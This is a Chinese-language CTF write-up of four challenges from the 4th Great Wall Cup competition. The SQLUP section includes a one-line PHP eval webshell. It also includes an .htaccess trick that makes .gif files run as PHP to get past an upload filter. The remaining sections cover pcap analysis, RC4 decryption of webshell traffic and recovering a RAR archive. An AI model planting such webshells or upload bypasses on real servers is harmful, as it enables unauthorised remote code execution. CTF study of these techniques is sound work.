当前位置: 首页 > news >正文

第四届长城杯部分wp

还是太菜了,要经常练了

1.BrickGame

通过游戏就可以得到flag

2.SQLUP

一道文件上传的题目,在登陆页面我用admin和1登陆成功了,但是按照正常的应该是要爆破,用bp爆破得到下面的页面

登陆成功后,点击头像就可以进行文件上传,先上传一个php文件发现它限制带p的文件。

那就我想到了.htaccess文件和.user.ini文件,我使用的.htaccess文件,文件内容如下

AddType application/X-httped-php .gif

然后在上传一个1.gif文件,gif文件内容就是一句话木马

<?php @eval($_POST[1]);?>

然后访问url+uploads/gif文件名

探针测试了一下发现上传成功了

之后连接蚁剑,直接cat flag不行,需要提权,提权命令如下

tac -s 'RANDOM' "/flag"

得到flag

3.漏洞探测,流量解密

下载附件打开,发现有两个阶段,第二阶段的压缩包密码是第一阶段的攻击ip;

先在第一阶段找攻击ip,

我们可以看到木马文件为gateway.php

然后在日志中可以看到上传gateway.php的主机ip地址为192.168.30.234

因此压缩包密码为192.168.30.234

打开压缩包,还是一个流量文件,用wireshark打开,导出http流,查看其中gateway.php文件中执行的命令和回显。

在某一个文件中找到了提示,加密方式是RC4

 

在剩余文件中找到了key和raw,即秘钥和密文

 

 

把raw前面的key删了用rc4解密就得到flag了

4.最安全的加密方式

下载附件打开,用Wireshark打开流量,点击左上角文件里的导出对象里的http,将里面的文件全部导出

将每个文件依次使用记事本打开,发现index(3).php和index(6).php文件里的内容与其他不同,打开index(6).php发现rar头

 

然后进入wireshark将将它进行原始数据进行转换,转换之后将红色部分的原始数据在010中创建一个16进制文件如何将红色部分的在010中按crl+shift+v复制下来将多余的数据删掉,前面找到rar部分,最前面都删掉,后面的---的全部删掉,得到一个压缩包,需要密码,在另一个文件中找到密码

25ming

打开压缩包中的文档,发现有一堆md5数据,逐行解密md5即可得到flag


http://www.mrgr.cn/news/22560.html

相关文章:

  • DeepSeek-V2.5:兼具通用能力和编码能力的新型开源模型
  • iotdbtool助力时序数据库IoTDB高效运维
  • 只需一个类文件,Erupt 可以能完成整个后台管理?这个低代码值得一试
  • 业务协同平台--简介
  • 实现一个线程安全的队列:C++实战指南
  • 浅谈C#之线程锁
  • 【C语言】快速排序——动图演示
  • Matlab simulink建模与仿真 第十一章(端口及子系统库)【上】
  • JAVA智听未来一站式有声阅读平台听书系统小程序源码
  • 0.91/ 0.96寸等OLED芯片SSD1306 十分有趣的使用方法
  • CLine Action Editor 动画技能编辑器游戏工具
  • 【30天玩转python】字典与集合
  • k8s--资源管理
  • windows手工杀毒-寻找可疑进程之内存
  • 1986-2015年 中国城镇住户调查微观数据UHS
  • Oracle(114)什么是增量备份(Incremental Backup)?
  • C++如何设计函数多返回值以及如何加速输入输出效率
  • TensorFlow
  • 无人机专业大学,除了理论还必须会组装、调试、硬件才更好就业
  • 【数据结构】排序算法系列——选择排序(附源码+图解)